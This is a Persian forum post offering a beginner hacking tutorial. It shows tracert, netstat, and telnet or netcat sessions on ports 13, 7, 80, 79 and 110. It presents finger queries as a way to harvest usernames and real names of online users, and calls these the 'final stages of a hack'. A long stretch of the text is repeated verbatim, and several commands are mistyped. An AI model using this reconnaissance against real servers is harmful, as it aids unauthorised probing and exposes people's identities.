يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ipadress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /HTTP/1.0نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnetalborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید
    سلام دستور Tracert اين دستور ميگه که از چند تا کامپيوتر بگذريم تا به lover-hackers.comبرسيم دستور رو در CMdبه اين شکل اجرا کنين tracert your domainکه به جای your doaminآدرس سايتو بنويسيد. پورتهای باز کامپيوتر خودمان را ببينيم خوب شما الان چون با مفهوم پورت آشنا هستيد و ميدونيد در هک اساسی ترسن کارها رو پورت انجام ميشه و حتی با ميتوان با باز بودن پورت يک کامپيوتر بهش نفوذ کرد اين خيلی مهمه که پورتهای باز خودتونو ببينيد.از يکی از اين دو دستور استفاده ميکنيم . ۱-درCMDويندوزتان تايپ کنيدnetstat -anکه اين دستور پورتها رو به صورت عدد نشون ميده به خاطر اون numberآخرش ۲-دستور netstat -aمعادل اسمس آن پورت را نمايش ميدهد من قسمتيش واستون ميگم در خط اولش نوشته Protoکه معادل آن است که پروتکل شما TCP or UPDاست بعد ميريم سراغLocal Adress که اونجا هم IPرو نوشته وپورتها رو البته ماله خودتون است و در آخر Stateوضعيت اتصال رو نمايش ميده حالا با استفاده از اينا چيکار کنيم؟خوب ميتونيم ببينيم Trojanروش فعال است يا نه؟ يه توضيح کوچک در مورد تروجان بدم که اسبهای تروجان ويروسهايی هستن که پورت خاصی رو کامپيوتر طرف باز نگه ميدارن و شما به اون کامپيوتر نفوذ ميکنيد که معروفترین اونا ساب سون هست. به دست آوردن اسم کامپيوتر يک کلاينت: اول يه تعريف کوچولو برای کلاينت:به کامپيوترهايی که با Dial upوصل هستند يا در تعريف خودمانی همون کامپيوترهای خودمنو ميگيم .خوب برای به دست آوردن اسم کامپيوتر طرف بايد باهاش چت کنين اما برای مطمعن شدن بايد بگی طرف Voiceبده. اگه داد اين عبارتو تايپ کنيدnetstat اما مهمترين چيز اين است که به دنبال شماره ۵۱۰۱بگردين چون اين کمک به حال گيری ميکنه. معرفی پورتها و صحبت کردن با آنها مراحل آخر هک : خوب بايد ياد بگيريم با پورتها صحبت کنيم اين مطلب راحته و همش از يه دستور استفاده ميشه صحبت با پورت ۱۳ ۱-پورت ۱۳ که پورت Daytimeناميده ميشه خيلی ساده لوحه و هميشه راست ميگه البته هميشه اين پورتو ميبندن يا به قول معروف خفش ميکنن برای صحبت کردن با آن اين دستور را اجرا کنيد telnet ipadress 13يا nc -v ip adress 13 خوب به چه درد ميخوره؟ميتونيم تشخيص بديم کامپيوتر در ايران است يا نه با توجه به تاريخ و ساعتش مفهومه که؟ صحبت با پورت ۷ اين پورت کاره خاصی نميکنه فقط هر چی بهش بدين براتون همونو پس ميفرسته چه مسخره!!! بعد اينم دستورشtelnet your ip adress 7يا nc -v ip 13و به جای همه ی دستورات بالا به جای ip ياypur ip adressشماipسايتتونو بنويسيد صحبت با پورت ۸۰ اين پورت کارش اينه که برای جستجوی صفحات اينترنتی ميره اولين دستور ميگه هر چی headerهست رو نشون بدهGET /HTTP/1.0نتايج من ديگه نشون ندادم خودتون امتحان کنيد. جالبه!!! دومين دستور ميگه که هر چی هست يعنی در اينجا whatکار ميبريم نشون بده GET /what/everولی شما رای اين کار مسيرو بديد کجاهارو ميخوان مثلاexe صحبت با پورت ۷۹ مهمه خوب اين پورت Endeحاله يعنی اينکه شما ميتونين با استفاده از اين دستور بفهمين چند نفر از کاربران ISPشما onهستن و همچنين شايد خوش شانس باشيد و ISPدر پيتس باشه USER NAMEهم ميده و مثلا اسم يه کامپيوتر alborzاست خوب اينم ۳ تا دستور برای گرفتن اطلاعات telnetalborz.com79 nc -v alborz.com79 finger @alborz.com79 اين پورت بستگی به سرور داره ممکنه usernameهم نشون بده و حتی نام نام خانوادگی افراد آنلاين پس همين الان دسته به کار شويد و به serverهای مختلف telnetکنين و اين usernameهام که گفتم به چه دردی ميخوره به درده دود کردن اينترنت ميخوره صحبت با پورت ۱۱۰ اين پورت برای خواندن ايمیل به کار ميره مثلا من در نو آور ايميل دارم پس ميخوام ايميلهامو چک کنم تايپ ميکنمtelnet mail.noavar.com 110ياnc -v mail.noavar.com 110 بعدش وارد يه محيط مثل ftpميشين بعد از شما userوpassميخوادکه شما بدين خوب الان در درون ايميل هايتان غلط ميزنيد و اين دستورهای مهم را هم اجرا کنيد اين دستور حجم کليه ايميلهای رسيده را ميگهstat اين دستور ليست پيام ها رو ميگه list در اين دستور متن نامه رو ميخوانيم البته بگم شماره ی مورد نظرتونو برای خواندنش وارد کنيدretr پاک کردن ايميل dele 54 برای خارج شدنquit امیدوارم از این آموزش خوشتو آمده باشه اگه خدا بخواد حرفه ایشم می گذارم اگه بد بود ببخشید دیگه بهتر از این نتونستم بگم امیدوارم به کارتون خورده باشه شاد و پیروز باشید

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

• شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •